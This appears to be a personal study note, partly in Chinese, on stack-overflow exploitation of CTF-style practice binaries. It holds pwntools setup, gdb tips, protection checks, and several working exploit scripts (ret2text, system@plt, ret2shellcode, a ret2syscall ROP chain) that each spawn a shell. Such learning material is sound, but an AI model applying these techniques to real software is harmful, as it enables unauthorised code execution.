原理
危险函数:gets scanf
pwndbg
Python2 安装
# Python 2 route (per the heading above): pwntools from PyPI
pip install pwntools
# Python 3 route: build prerequisites, then pwntools from the upstream dev3 branch.
# NOTE: this installs from a moving git branch rather than a pinned release, so
# re-running it can pull different code; pin a tag/release for reproducibility.
apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade git+https://github.com/Gallopsled/pwntools.git@dev3
ni 单步
si 单步进入子函数
libc-database
例子
pwntools getshell
# level0: stack-overflow practice binary driven with pwntools.
# NOTE: the payload is a str literal (Python 2 pwntools idiom). Under Python 3
# pwntools, p64() returns bytes, so 'a'*0x80 + p64(...) raises TypeError there.
from pwn import *
sh = process('./level0')
# address of the code in the binary that calls system (the note's "调用system地址")
callsystem = 0x400596
# p64 emits it little-endian: 96 05 40 00 00 00 00 00
# 0x80 bytes of 'a' fill the buffer, 8 bytes of 'b' overwrite the saved frame
# pointer (the note writes "ebs"; with p64 this is the 8-byte rbp slot), then
# the saved return address is replaced with callsystem
payload = 'a'*0x80 + 'b'*8 + p64(callsystem)
# breakpoint: uncomment to attach a debugger before the payload is sent
# gdb.attach(sh)
sh.send(payload)
# hand the process over to the terminal
sh.interactive()
# 查看内存数据 5个字节
# x/5bx 0x400596
# 继续执行
# cn
# 检查安全保护
checksec level0
# 查看 ASLR 是否开启
cat /proc/sys/kernel/randomize_va_space
保护
查看保护属性
PIE
NX
RELRO
Partial RELRO
Full RELRO
ret2text
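# ret2text: overwrite the saved return address with the address of the
# backdoor function already present in the binary.
# NOTE: the payload is a str literal (Python 2 pwntools idiom); Python 3
# pwntools would need b'' literals because p32() returns bytes.
from pwn import *
sh = process('./ret2text')
# address of the backdoor function. The hex literal needs the 0x prefix:
# a bare 0804846D is a SyntaxError (and would not be hex).
backdoor = 0x0804846D
# 0x28 bytes of padding, 4 bytes for the saved ebp, then the return address
payload = 'a'*0x28 + 'b'*4 + p32(backdoor)
sh.send(payload)
sh.interactive()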
level2
用到plt表
# level2: call system() through its PLT entry (the note: "用到plt表").
# NOTE: str payloads — Python 2 pwntools idiom; Python 3 pwntools needs b'' literals.
from pwn import *
sh = process('./level2')
system_plt = 0x8048320
# presumably the address of a "/bin/sh" string inside the binary — confirm
bin_sh = 0x804a024
# fill the stack buffer (0x88 bytes) and the 4-byte saved ebp (the note's "ebs")
payload = 'a'*0x88 + 'b'*4
# return address -> system@plt, then system's own return address (never used,
# so 0), then system's single argument
payload += p32(system_plt) + p32(0) + p32(bin_sh)
#gdb.attach(sh)
sh.send(payload)
sh.interactive()
ret2shellcode
level1
# level1 (ret2shellcode): the binary prints its buffer address, so the payload
# places shellcode in that buffer and returns into it. This relies on the
# buffer being executable (NX disabled) — verify with checksec first.
# NOTE: str payloads and ljust(..., 'a') — Python 2 pwntools idiom.
from pwn import *
sh = process('./level1')
# the program prints "What's this:0x<addr>?"; read the hex digits up to '?'
sh.recvuntil('What\'s this:0x')
buf_addr = sh.recvuntil('?', drop=True)
buf_addr = int(buf_addr, 16)
# no context.arch is set here, so shellcraft/asm use pwntools' default target
shellcode = asm(shellcraft.sh())
# shellcode padded with 'a' to 0x88 bytes, 4 bytes for the saved ebp (the
# note's "ebs"), then the return address pointing back at the leaked buffer
payload = shellcode.ljust(0x88, 'a') + 'b'*4 + p32(buf_addr)
sh.send(payload)
sh.interactive()
ret2syscall
ROP
控制三次返回地址
# ret2syscall: chain gadgets to issue an execve syscall via int 0x80
# (the note: "控制三次返回地址" — three return addresses are controlled).
# NOTE: str payloads and .next() are Python 2 idioms; Python 3 pwntools
# would need b'/bin/sh\x00' and next(elf.search(...)).
from pwn import *
elf = ELF('./ret2syscall')
sh = process('./ret2syscall')
pop_eax_ret = 0x080b8316
# pops three registers then returns. Which registers, and in what order, is
# not recorded here; the two zeros and bin_sh below must land in edx/ecx/ebx
# in the gadget's pop order — confirm against its disassembly
pop3_ret = 0x0806edd0
int_0x80 = 0x0806ca25
# find a NUL-terminated "/bin/sh" inside the binary
bin_sh = elf.search('/bin/sh\x00').next()
# goal: execve("/bin/sh", 0, 0) — eax = 0xb (32-bit x86 execve number),
# ebx = pointer to "/bin/sh", ecx = edx = 0
payload = 'a'*0x28 + 'b'*4
payload += p32(pop_eax_ret) + p32(0xb)
payload += p32(pop3_ret) + p32(0) + p32(0) + p32(bin_sh)
payload += p32(int_0x80)
sh.send(payload)
sh.interactive()
堆内存
相关资料
https://wiki.x10sec.org/